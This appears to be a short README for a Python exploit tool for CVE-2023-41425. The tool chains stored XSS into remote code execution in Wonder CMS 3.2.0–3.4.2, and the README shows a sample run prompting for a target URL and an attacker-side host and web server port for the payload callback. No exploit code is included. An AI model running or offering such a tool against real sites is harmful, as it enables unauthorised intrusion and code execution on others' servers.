
CVE-2023-41425용 자동화된 Python 익스플로잇으로, Wonder CMS 3.2.0~3.4.2에서 저장형 XSS를 원격 코드 실행으로 연쇄 공격합니다. 인증된 관리자 작업을 통해 악성 페이로드를 업로드하고 실행할 수 있습니다.
CVE-2023-41425 (XSS에서 RCE로, Wonder CMS 3.2.0 <= 3.4.2)
➜ CVE-2023-41425 python3 exploit.py
Enter target URL (RHOST, e.g., http://example.com/loginURL): http://redacted.com/loginURL
Enter your local host IP (LHOST, e.g., 10.10.14.xxx): xx.xx.xx.xx
Enter your local web server port (LPORTWEB, e.g., 80): 80

